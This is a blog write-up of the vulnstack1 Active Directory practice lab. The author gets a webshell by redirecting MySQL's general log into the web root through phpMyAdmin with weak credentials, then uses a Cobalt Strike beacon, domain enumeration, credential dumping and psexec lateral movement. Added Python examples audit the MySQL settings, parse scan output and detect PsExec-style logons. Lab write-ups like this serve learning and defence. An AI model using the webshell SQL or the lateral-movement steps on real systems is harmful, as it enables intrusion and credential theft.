vulnstack1

Environment setup

Topology diagram

VMware NIC configuration

VMnet3 is the NIC shared by the external web server and the Kali attacker machine

VMnet2 is the NIC shared by the external web server and the domain hosts

The web server has to be reachable by customers and also has to talk to the internal hosts, so it needs two NICs.

IP addresses of each host

  • Attacker: Kali
    • IP: 192.168.33.130
  • Web server: Windows 7
    • IP: 192.168.33.129 (external)
    • IP: 192.168.52.143 (internal)
    • Hostname: stu1
  • Domain member: Windows Server 2003
    • IP: 192.168.52.141
    • Hostname: root-tvi862ubeh
  • Domain controller: Windows Server 2008
    • IP: 192.168.52.138
    • Hostname: owa

Before starting

Log in to the Windows 7 machine, open phpStudy and start the web service.

External penetration

Information gathering

Host discovery

┌── root@kali -> [/tmp] 
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:29:88:93, IPv4: 192.168.33.130
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.33.1 00:50:56:c0:00:03 VMware, Inc.
192.168.33.129 00:0c:29:27:08:23 VMware, Inc.
192.168.33.254 00:50:56:f7:12:b7 VMware, Inc.

This gives the target host IP: 192.168.33.129

Port scan

┌── root@kali -> [~/tools] 
└─# ./fscan -h 192.168.33.129 -np

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] 最终有效主机数量: 1
[*] 共解析 218 个有效端口
[+] 端口开放 192.168.33.129:80
[+] 端口开放 192.168.33.129:445
[+] 端口开放 192.168.33.129:139
[+] 端口开放 192.168.33.129:135
[+] 端口开放 192.168.33.129:3306
[+] 存活端口数量: 5
[*] 开始漏洞扫描...
[!] 扫描错误 192.168.33.129:139 - netbios error
[*] NetInfo
[*] 192.168.33.129
[->] stu1
[->] 192.168.33.129
[->] 192.168.52.143
[->] 169.254.129.186
[+] MS17-010 192.168.33.129 (Windows 7 Professional 7601 Service Pack 1)
[*] 网站标题 http://192.168.33.129 状态码:200 长度:14749 标题:phpStudy 探针 2014
[!] 扫描错误 192.168.33.129:3306 - Error 1130: Host '192.168.33.130' is not allowed to connect to this MySQL server
[+] 扫描已完成: 5/5
[*] 扫描结束,耗时: 19.494685409s

The scan flags EternalBlue (MS17-010), but let's look at the web service first. The host also has several IP addresses, so there are internal hosts behind it.

Directory scan

┌── root@kali -> [~/tools] 
└─# dirsearch -u http://192.168.33.129
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/tools/reports/http_192.168.33.129/_25-04-24_21-17-35.txt

Target: http://192.168.33.129/

[21:17:36] Starting:
[21:17:38] 403 - 215B - /%C0%AE%C0%AE%C0%AF
[21:17:38] 403 - 211B - /%3f/
[21:17:38] 403 - 210B - /%ff
[21:17:40] 403 - 220B - /.ht_wsr.txt
[21:17:40] 403 - 223B - /.htaccess.orig
[21:17:40] 403 - 223B - /.htaccess.save
[21:17:40] 403 - 224B - /.htaccess_extra
[21:17:40] 403 - 221B - /.htaccessBAK
[21:17:40] 403 - 223B - /.htaccess.bak1
[21:17:40] 403 - 225B - /.htaccess.sample
[21:17:40] 403 - 222B - /.htaccessOLD2
[21:17:40] 403 - 213B - /.htm
[21:17:40] 403 - 223B - /.htaccess_orig
[21:17:40] 403 - 221B - /.htaccessOLD
[21:17:40] 403 - 223B - /.htpasswd_test
[21:17:40] 403 - 214B - /.html
[21:17:40] 403 - 221B - /.htaccess_sc
[21:17:40] 403 - 219B - /.htpasswds
[21:17:40] 403 - 220B - /.httr-oauth
[21:18:08] 403 - 225B - /index.php::$DATA
[21:18:18] 200 - 71KB - /phpinfo.php
[21:18:18] 301 - 241B - /phpmyadmin -> http://192.168.33.129/phpmyadmin/
[21:18:18] 301 - 241B - /phpMyAdmin -> http://192.168.33.129/phpMyAdmin/
[21:18:19] 200 - 4KB - /phpmyAdmin/
[21:18:19] 200 - 32KB - /phpmyadmin/ChangeLog
[21:18:19] 200 - 4KB - /phpMyAdmin/
[21:18:19] 200 - 4KB - /phpMyadmin/
[21:18:19] 200 - 4KB - /phpmyadmin/
[21:18:19] 200 - 4KB - /phpmyadmin/index.php
[21:18:19] 200 - 4KB - /phpMyAdmin/index.php
[21:18:19] 200 - 2KB - /phpmyadmin/README
[21:18:31] 403 - 225B - /Trace.axd::$DATA
[21:18:34] 403 - 226B - /web.config::$DATA

GETSHELL

Visiting the site reveals the absolute path C:/phpStudy/WWW

phpMyAdmin requires a login

The weak credential root:root gets straight in; otherwise brute-force it.

Once inside, check the SQL variable settings

and look for a way to get a shell.

Check the secure_file_priv parameter to see whether writing files is allowed.

It turns out to be NULL. So try writing through the log instead; look up the log file path.

MySQL 5.0 and later can write log files. By changing the log's global variables you can turn logging on and point the log file at a path of your choosing; a query that contains a one-line webshell is then recorded into that log file, which yields a shell. The prerequisite is read/write permission on the generated log file.

Log path: C:\phpStudy\MySQL\data\stu1.log

But the log state is OFF

It needs to be turned on, which just takes a few SQL statements.

set global general_log = "ON";
set global general_log_file="C://phpStudy/www/shell.php";
select "<?php eval($_POST[1]);?>";

This switches logging on and moves the log file into the web directory, and the SELECT writes the one-line webshell into that log file.

After that, connect with AntSword.

Webshell planted successfully.
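From the defender's side, the step above depended on three server settings (secure_file_priv, general_log, general_log_file) and on a MySQL account powerful enough to change them. The following audit is an added example, not code from the original post: it takes SHOW VARIABLES name/value pairs as a plain dict and reports the conditions that let SQL statements drop files into the web root. The two variable sets and the web root path are constructed samples; the weak set mirrors the values used above, the hardened set is what a reviewer would expect to see.

```python
"""Added example (not part of the original post): audit the MySQL settings that
make the log-to-webroot trick above possible. No database connection is made;
input is a dict of SHOW VARIABLES name/value pairs.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

WEB_ROOTS = ["C:/phpStudy/WWW"]  # absolute path disclosed by the probe page above

# Constructed sample: state of the server after the post's SET GLOBAL statements.
WEAK_VARIABLES = {
    "secure_file_priv": "NULL",
    "general_log": "ON",
    "general_log_file": "C://phpStudy/www/shell.php",
    "slow_query_log": "OFF",
    "slow_query_log_file": "C:\\phpStudy\\MySQL\\data\\stu1-slow.log",
}

# Constructed sample: logging off, log files kept in the MySQL data directory.
HARDENED_VARIABLES = {
    "secure_file_priv": "NULL",
    "general_log": "OFF",
    "general_log_file": "C:\\phpStudy\\MySQL\\data\\stu1.log",
    "slow_query_log": "OFF",
    "slow_query_log_file": "C:\\phpStudy\\MySQL\\data\\stu1-slow.log",
}

# (toggle variable, path variable) pairs: server-written files that an account
# with SUPER can redirect at runtime with SET GLOBAL.
LOG_VARIABLES = [("general_log", "general_log_file"),
                 ("slow_query_log", "slow_query_log_file")]


@dataclass(frozen=True)
class Finding:
    severity: str
    message: str


def _norm(path: str) -> str:
    """Windows-style comparison key: one separator style, no trailing slash, case-folded."""
    return ntpath.normpath(path).rstrip("\\").lower()


def is_within(path: str, root: str) -> bool:
    """True when `path` is `root` itself or lies underneath it."""
    p, r = _norm(path), _norm(root)
    return p == r or p.startswith(r + "\\")


def assess_mysql_exposure(variables: dict[str, str],
                          web_roots: list[str] = WEB_ROOTS) -> list[Finding]:
    """Report settings that let SQL statements drop files where the web server executes them."""
    findings: list[Finding] = []

    # secure_file_priv governs INTO OUTFILE / LOAD_FILE only:
    #   NULL -> disabled, '' -> any directory the server can write, <dir> -> that directory only.
    sfp = variables.get("secure_file_priv", "NULL")
    if sfp == "":
        findings.append(Finding("high", "secure_file_priv is empty: INTO OUTFILE may write anywhere"))
    elif sfp.upper() != "NULL":
        for root in web_roots:
            if is_within(root, sfp) or is_within(sfp, root):
                findings.append(Finding("high", f"secure_file_priv {sfp!r} overlaps web root {root!r}"))

    # Log file paths are NOT covered by secure_file_priv; check each one separately.
    for toggle, path_var in LOG_VARIABLES:
        enabled = variables.get(toggle, "OFF").upper() == "ON"
        path = variables.get(path_var, "")
        for root in web_roots:
            if path and is_within(path, root):
                state = "and the log is ON" if enabled else "(log currently OFF)"
                findings.append(Finding("critical" if enabled else "high",
                                        f"{path_var} {path!r} is inside web root {root!r} {state}"))
    return findings


if __name__ == "__main__":
    for label, vars_ in (("weak", WEAK_VARIABLES), ("hardened", HARDENED_VARIABLES)):
        print(f"[{label}]")
        for f in assess_mysql_exposure(vars_) or [Finding("info", "no file-write exposure found")]:
            print(f"  {f.severity:8} {f.message}")
```

The check deliberately treats the log-file variables separately from secure_file_priv, because NULL there only closes INTO OUTFILE; it does not stop general_log_file from being pointed at the web directory. The fixes that remove the exposure are the ones the weak sample lacks: a dedicated application account without SUPER (so SET GLOBAL is refused), logging left off or kept in the data directory, and a file-system ACL that denies the MySQL service account write access to the web root, so even a redirected log cannot land there.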

Internal network penetration

Getting a CS beacon

CS prerequisites

First start the team server.

Then open the client and connect

Connect using the configured IP and password

Create a listener

Top left: Cobalt Strike -> Listen -> Add

Generate the backdoor file

Select the listener and generate

Upload via AntSword and execute

There is another system here too, but after I compromised it I found that it is really no different, so I'll put that getshell at the end.

Then execute the backdoor file.

The host comes online; open the beacon

Gathering domain information

Find the domain controller

ipconfig /all

The domain is god.org, and the current host is stu1.god.org

Find domain users

net user /domain

Domain users: administrator, ligang, liukaifeng01

Domain hosts

net group "domain computers" /domain

There are two hosts in the domain (the first entry is not online): ROOT-TVI862UBEH [192.168.52.141], STU1 [192.168.52.143]

Domain controller

net group "domain controllers" /domain

The domain controller is owa

  • Domain controller: owa
  • Domain users: administrator, ligang, liukaifeng01
  • Domain hosts: ROOT-TVI862UBEH [192.168.52.141], STU1 [192.168.52.143]
  • Domain: god.org

Lateral movement

Obtaining credentials

Obtaining credentials here means obtaining NTLM hashes. NTLM is an authentication protocol; on Windows the NTLM hashes it uses are stored in the SAM database or in the NTDS.dit file. With an NTLM hash in hand one can attempt pass-the-hash (PTH), hash cracking, man-in-the-middle attacks and similar.

NTLM hashes obtained. Next step: internal network discovery.

Internal network discovery

Set up a tunnel with the socks module

On Kali, use proxychains

Once the tunnel was up I chose fscan for the scan.

┌── root@kali -> [~/tools] 
└─# proxychains4 ./fscan -h 192.168.52.0/24
[proxychains] config file found: /root/.proxychains/proxychains.conf
[proxychains] preloading /usr/local/lib/libproxychains4.so

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 2.0.0
[*] 扫描类型: all, 目标端口: 21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017,80,81,82,83,84,85,86,87,88,89,90,91,92,98,99,443,800,801,808,880,888,889,1000,1010,1080,1081,1082,1099,1118,1888,2008,2020,2100,2375,2379,3000,3008,3128,3505,5555,6080,6648,6868,7000,7001,7002,7003,7004,7005,7007,7008,7070,7071,7074,7078,7080,7088,7200,7680,7687,7688,7777,7890,8000,8001,8002,8003,8004,8006,8008,8009,8010,8011,8012,8016,8018,8020,8028,8030,8038,8042,8044,8046,8048,8053,8060,8069,8070,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096,8097,8098,8099,8100,8101,8108,8118,8161,8172,8180,8181,8200,8222,8244,8258,8280,8288,8300,8360,8443,8448,8484,8800,8834,8838,8848,8858,8868,8879,8880,8881,8888,8899,8983,8989,9000,9001,9002,9008,9010,9043,9060,9080,9081,9082,9083,9084,9085,9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9200,9443,9448,9800,9981,9986,9988,9998,9999,10000,10001,10002,10004,10008,10010,10250,12018,12443,14000,16080,18000,18001,18002,18004,18008,18080,18082,18088,18090,18098,19001,20000,20720,21000,21501,21502,28018,20880
[*] 开始信息扫描...
[*] CIDR范围: 192.168.52.0-192.168.52.255
[*] 已生成IP范围: 192.168.52.0 - 192.168.52.255
[*] 已解析CIDR 192.168.52.0/24 -> IP范围 192.168.52.0-192.168.52.255
[*] 最终有效主机数量: 256
[+] 目标 192.168.52.1 存活 (ICMP)
[+] 目标 192.168.52.138 存活 (ICMP)
[+] 目标 192.168.52.143 存活 (ICMP)
[+] 目标 192.168.52.141 存活 (ICMP)
[+] ICMP存活主机数量: 4
[*] 共解析 218 个有效端口
[+] 端口开放 192.168.52.141:8099
[+] 端口开放 192.168.52.141:8098
[+] 端口开放 192.168.52.143:80
[+] 端口开放 192.168.52.138:80
[+] 端口开放 192.168.52.141:21
[+] 端口开放 192.168.52.1:139
[+] 端口开放 192.168.52.1:3306
[+] 端口开放 192.168.52.1:445
[+] 端口开放 192.168.52.1:135
[+] 端口开放 192.168.52.141:445
[+] 端口开放 192.168.52.143:445
[+] 端口开放 192.168.52.138:445
[+] 端口开放 192.168.52.138:139
[+] 端口开放 192.168.52.143:3306
[+] 端口开放 192.168.52.141:135
[+] 端口开放 192.168.52.141:139
[+] 端口开放 192.168.52.143:135
[+] 端口开放 192.168.52.138:135
[+] 端口开放 192.168.52.143:139
[+] 端口开放 192.168.52.138:88
[+] 端口开放 192.168.52.141:7002
[+] 端口开放 192.168.52.141:7001
[+] 端口开放 192.168.52.1:7890
[+] 存活端口数量: 23
[*] 开始漏洞扫描...
[!] 扫描错误 192.168.52.1:3306 - Error 1130: Host 'cxcx' is not allowed to connect to this MySQL server
[!] 扫描错误 192.168.52.1:445 - read tcp 192.168.6.135:39408->192.168.52.1:445: read: connection reset by peer
[*] NetInfo
[*] 192.168.52.1
[->] cxcx
[->] 172.22.224.1
[->] 192.168.111.1
[->] 192.168.6.1
[->] 192.168.56.1
[->] 10.34.11.4
[->] 198.18.0.1
[->] 192.168.52.1
[->] 192.168.33.1
[*] 网站标题 http://192.168.52.1:7890 状态码:400 长度:0 标题:无标题
[!] 扫描错误 192.168.52.1:7890 - Get "https://192.168.52.1:7890": EOF
[!] 扫描错误 192.168.52.143:139 - netbios error
[*] NetInfo
[*] 192.168.52.138
[->] owa
[->] 192.168.52.138
[!] 扫描错误 192.168.52.141:139 - netbios error
[*] NetInfo
[*] 192.168.52.141
[->] root-tvi862ubeh
[->] 192.168.52.141
[!] 扫描错误 192.168.52.138:88 - Get "http://192.168.52.138:88": read tcp 192.168.6.135:50074->192.168.52.138:88: read: connection reset by peer
[*] NetInfo
[*] 192.168.52.143
[->] stu1
[->] 192.168.33.129
[->] 192.168.52.143
[->] 169.254.129.186
[+] MS17-010 192.168.52.143 (Windows 7 Professional 7601 Service Pack 1)
[+] MS17-010 192.168.52.138 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetBios 192.168.52.138 [+] DC:owa.god.org Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[*] 网站标题 http://192.168.52.141:7002 状态码:200 长度:2632 标题:Sentinel Keys License Monitor
[+] MS17-010 192.168.52.141 (Windows Server 2003 3790)
[*] 网站标题 http://192.168.52.138 状态码:200 长度:689 标题:IIS7
[+] ftp 192.168.52.141:21:anonymous
[*] 网站标题 http://192.168.52.143 状态码:200 长度:14749 标题:phpStudy 探针 2014
[*] 网站标题 https://192.168.52.141:8098 状态码:401 长度:1656 标题:You are not authorized to view this page
[*] 网站标题 http://192.168.52.141:8099 状态码:403 长度:1409 标题:The page must be viewed over a secure channel
[!] 扫描错误 192.168.52.1:139 - netbios error
[!] 扫描错误 192.168.52.141:7001 - Get "http://192.168.52.141:7001": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[!] 扫描错误 192.168.52.143:3306 - Error 1130: Host '192.168.52.1' is not allowed to connect to this MySQL server
[+] 扫描已完成: 23/23
[*] 扫描结束,耗时: 53.495039221s
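A scan like the one above is also what a blue team runs against its own ranges, and the useful output is a per-host inventory rather than a wall of lines. The parser below is an added example, not part of fscan or of the original post: it reads fscan 2.x console lines (port, alive, MS17-010, NetInfo/NetBios, ftp and web-title records) into Host records and ranks them for remediation. SAMPLE_OUTPUT is an excerpt of the scan output shown above; the Host record and the scoring weights are this example's own.

```python
"""Added example (not part of the original post): turn fscan 2.x console output
into a per-host inventory and rank hosts for remediation.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Excerpt of the scan output above (no hosts or findings added).
SAMPLE_OUTPUT = """\
[+] 目标 192.168.52.138 存活 (ICMP)
[+] 目标 192.168.52.143 存活 (ICMP)
[+] 目标 192.168.52.141 存活 (ICMP)
[+] 端口开放 192.168.52.141:21
[+] 端口开放 192.168.52.138:445
[+] 端口开放 192.168.52.138:88
[+] 端口开放 192.168.52.143:445
[+] 端口开放 192.168.52.143:3306
[*] NetInfo
[*] 192.168.52.138
[->] owa
[->] 192.168.52.138
[!] 扫描错误 192.168.52.141:139 - netbios error
[*] NetInfo
[*] 192.168.52.143
[->] stu1
[->] 192.168.33.129
[->] 192.168.52.143
[+] MS17-010 192.168.52.143 (Windows 7 Professional 7601 Service Pack 1)
[+] MS17-010 192.168.52.138 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
[*] NetBios 192.168.52.138 [+] DC:owa.god.org Windows Server 2008 R2 Datacenter 7601 Service Pack 1
[+] MS17-010 192.168.52.141 (Windows Server 2003 3790)
[*] 网站标题 http://192.168.52.138 状态码:200 长度:689 标题:IIS7
[+] ftp 192.168.52.141:21:anonymous
"""

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
RE_ALIVE = re.compile(r"^\[\+\] 目标 (\S+) 存活")
RE_PORT = re.compile(r"^\[\+\] 端口开放 (\S+):(\d+)$")
RE_VULN = re.compile(r"^\[\+\] (MS\d{2}-\d{3}) (\S+) \((.*)\)$")
RE_DC = re.compile(r"^\[\*\] NetBios (\S+) \[\+\] DC:(\S+)")
RE_FTP = re.compile(r"^\[\+\] ftp (\S+):(\d+):(\S+)$")
RE_TITLE = re.compile(r"^\[\*\] 网站标题 (\S+) 状态码:(\d+) 长度:\d+ 标题:(.*)$")
RE_NETINFO_IP = re.compile(r"^\[\*\] (\S+)$")     # the "[*] <ip>" line after "[*] NetInfo"
RE_NETINFO_ITEM = re.compile(r"^\[->\] (\S+)$")   # hostname or address lines that follow it


@dataclass
class Host:
    ip: str
    alive: bool = False
    hostname: str | None = None
    addresses: set[str] = field(default_factory=set)
    ports: set[int] = field(default_factory=set)
    os_name: str | None = None
    vulns: list[str] = field(default_factory=list)
    dc_name: str | None = None
    anonymous_ftp: bool = False
    titles: dict[str, str] = field(default_factory=dict)

    @property
    def is_dc(self) -> bool:
        return self.dc_name is not None

    def score(self) -> int:
        # Remediation priority (this example's own weighting): a domain controller with a
        # wormable SMB bug outranks everything else; each exposed port adds a little.
        return 100 * self.is_dc + 50 * len(self.vulns) + 20 * self.anonymous_ftp + len(self.ports)


def parse_fscan(text: str) -> dict[str, Host]:
    hosts: dict[str, Host] = {}

    def get(ip: str) -> Host:
        return hosts.setdefault(ip, Host(ip))

    netinfo_pending = False       # saw "[*] NetInfo"; the next "[*] <ip>" names the host
    current: Host | None = None   # host whose "[->]" lines are being read
    for raw in text.splitlines():
        line = raw.strip()
        if line == "[*] NetInfo":
            netinfo_pending, current = True, None
            continue
        if netinfo_pending and (m := RE_NETINFO_IP.match(line)):
            current, netinfo_pending = get(m.group(1)), False
            continue
        if current is not None and (m := RE_NETINFO_ITEM.match(line)):
            item = m.group(1)
            if IPV4.match(item):
                current.addresses.add(item)
            else:
                current.hostname = item
            continue
        current = None  # any other line ends the NetInfo block
        if m := RE_ALIVE.match(line):
            get(m.group(1)).alive = True
        elif m := RE_PORT.match(line):
            get(m.group(1)).ports.add(int(m.group(2)))
        elif m := RE_VULN.match(line):
            h = get(m.group(2))
            h.vulns.append(m.group(1))
            h.os_name = m.group(3)
        elif m := RE_DC.match(line):
            get(m.group(1)).dc_name = m.group(2)
        elif m := RE_FTP.match(line):
            h = get(m.group(1))
            h.ports.add(int(m.group(2)))
            h.anonymous_ftp = h.anonymous_ftp or m.group(3) == "anonymous"
        elif m := RE_TITLE.match(line):
            url, title = m.group(1), m.group(3)
            get(urlparse(url).hostname).titles[url] = title
    return hosts


def rank(hosts: dict[str, Host]) -> list[Host]:
    """Hosts ordered by descending score, IP as tie-breaker."""
    return sorted(hosts.values(), key=lambda h: (-h.score(), h.ip))


if __name__ == "__main__":
    for h in rank(parse_fscan(SAMPLE_OUTPUT)):
        tags = ["DC"] * h.is_dc + h.vulns + ["anon-ftp"] * h.anonymous_ftp
        print(f"{h.score():4} {h.ip:16} {h.hostname or '-':16} ports={sorted(h.ports)} {' '.join(tags)}")
```

Error lines such as "netbios error" are ignored rather than treated as findings. Run over the full output above, the ranking puts owa first: it is the domain controller, it exposes 445 and it is reported as MS17-010-vulnerable, which is exactly the combination that lets a single SMB exploit take the whole domain.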

Of these, the domain controller owa is 192.168.52.138 and the domain member root-tvi862ubeh is 192.168.52.141,

and both are vulnerable to EternalBlue.

Bringing the DC online in CS

Create an SMB listener

Get plaintext passwords with logonpasswords.

Lateral movement with psexec

Choose the plaintext credential and the listener; for the session, pick a working, already-controlled host in the domain

It then comes online; the domain member is done the same way.
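The psexec step above, and the NTLM credential reuse from the "Obtaining credentials" section that it builds on, leave a characteristic pair of records on the target: a network logon (Security event 4624, LogonType 3) followed seconds later by a service installation (System event 7045) whose binary was dropped into an admin share. The correlation below is an added example, not code from the original post or from Cobalt Strike. SAMPLE_EVENTS are constructed records for the lab hosts in this post; field names follow the real 4624/7045 event schemas, while the timestamps, service names, paths and the heuristics themselves (admin-share image path, short random service name, 120-second window) are this example's assumptions.

```python
"""Added example (not part of the original post): correlate Windows Security
4624 network logons with System 7045 service installations to surface
PsExec-style lateral movement.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    time: datetime
    host: str            # computer that recorded the event
    event_id: int
    data: dict[str, str]


@dataclass(frozen=True)
class Alert:
    host: str
    service: str
    image: str
    reasons: tuple[str, ...]


def _t(s: str) -> datetime:
    return datetime.fromisoformat(s)


# Constructed sample records (schema field names are real; values are invented).
SAMPLE_EVENTS = [
    # Routine: Kerberos network logon from the member server, then a vendor agent install.
    Event(_t("2025-04-24T09:00:00"), "owa", 4624, {"LogonType": "3", "AuthenticationPackageName": "Kerberos",
          "TargetUserName": "svc_backup", "TargetDomainName": "GOD", "IpAddress": "192.168.52.141"}),
    Event(_t("2025-04-24T09:00:30"), "owa", 7045, {"ServiceName": "VendorAgent",
          "ImagePath": "C:\\Program Files\\Vendor\\Agent\\agent.exe", "AccountName": "LocalSystem"}),
    # Suspicious: NTLM network logon as Administrator from the web server (stu1), then a
    # service whose binary sits in the ADMIN$ share under a random-looking name.
    Event(_t("2025-04-24T21:40:02"), "owa", 4624, {"LogonType": "3", "AuthenticationPackageName": "NTLM",
          "TargetUserName": "Administrator", "TargetDomainName": "GOD", "IpAddress": "192.168.52.143"}),
    Event(_t("2025-04-24T21:40:05"), "owa", 7045, {"ServiceName": "a1b2c3d",
          "ImagePath": "\\\\127.0.0.1\\ADMIN$\\a1b2c3d.exe", "AccountName": "LocalSystem"}),
    # Console logon elsewhere: LogonType 2 is not a network logon and is ignored.
    Event(_t("2025-04-24T21:41:00"), "root-tvi862ubeh", 4624, {"LogonType": "2",
          "AuthenticationPackageName": "Negotiate", "TargetUserName": "ligang", "TargetDomainName": "GOD", "IpAddress": "-"}),
]

# Binary dropped straight into ADMIN$/C$ or the system root instead of an install directory.
SUSPICIOUS_IMAGE = re.compile(
    r"^(\\\\[^\\]+\\(admin\$|c\$)\\[^\\]+|%systemroot%\\[^\\]+|[a-z]:\\windows\\[^\\]+)$", re.IGNORECASE)
# Short alphanumeric names mixing letters and digits, typical of tool-generated service names.
RANDOM_NAME = re.compile(r"^(?=.*[a-z])(?=.*\d)[a-z0-9]{4,9}$", re.IGNORECASE)


def detect_lateral_service_installs(events: list[Event],
                                    window: timedelta = timedelta(seconds=120)) -> list[Alert]:
    """Flag 7045 installs with a service-level indicator that follow a network logon within `window`."""
    alerts: list[Alert] = []
    by_host: dict[str, list[Event]] = {}
    for e in events:
        by_host.setdefault(e.host, []).append(e)

    for host, evs in by_host.items():
        evs.sort(key=lambda e: e.time)
        logons = [e for e in evs if e.event_id == 4624 and e.data.get("LogonType") == "3"]
        for svc in (e for e in evs if e.event_id == 7045):
            name = svc.data.get("ServiceName", "")
            image = svc.data.get("ImagePath", "").strip('"')
            prior = [l for l in logons if svc.time - window <= l.time <= svc.time]
            if not prior:
                continue  # a service install with no recent network logon is not this pattern
            service_reasons = []
            if SUSPICIOUS_IMAGE.match(image):
                service_reasons.append("service binary placed in the admin share / system root")
            if RANDOM_NAME.match(name):
                service_reasons.append("random-looking service name")
            if not service_reasons:
                continue  # a network logon alone is far too common to alert on
            logon_reasons = [
                f"preceded by {l.data.get('AuthenticationPackageName')} network logon of "
                f"{l.data.get('TargetUserName')} from {l.data.get('IpAddress')}"
                for l in prior]
            alerts.append(Alert(host, name, image, tuple(service_reasons + logon_reasons)))
    return alerts


if __name__ == "__main__":
    for a in detect_lateral_service_installs(SAMPLE_EVENTS):
        print(f"{a.host}: service {a.service!r} ({a.image})")
        for r in a.reasons:
            print(f"  - {r}")
```

Both logs are needed for this to work: the 4624 lives in the target's Security log and the 7045 in its System log, so collection has to forward both from member servers and domain controllers alike. The window and the name heuristic are starting points to tune against a baseline of legitimate installs; the benign VendorAgent pair in the sample shows the rule staying quiet when the service binary has a normal install path and a meaningful name.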

I ran this several times, so there are some duplicates.

This was my first time attacking an internal network; some of my fundamentals are shaky and I'll fill them in over time.


Source: https://r3bir7hcx.github.io/2025/04/24/vulnstack1/
Author: CXCX
Posted on: April 24, 2025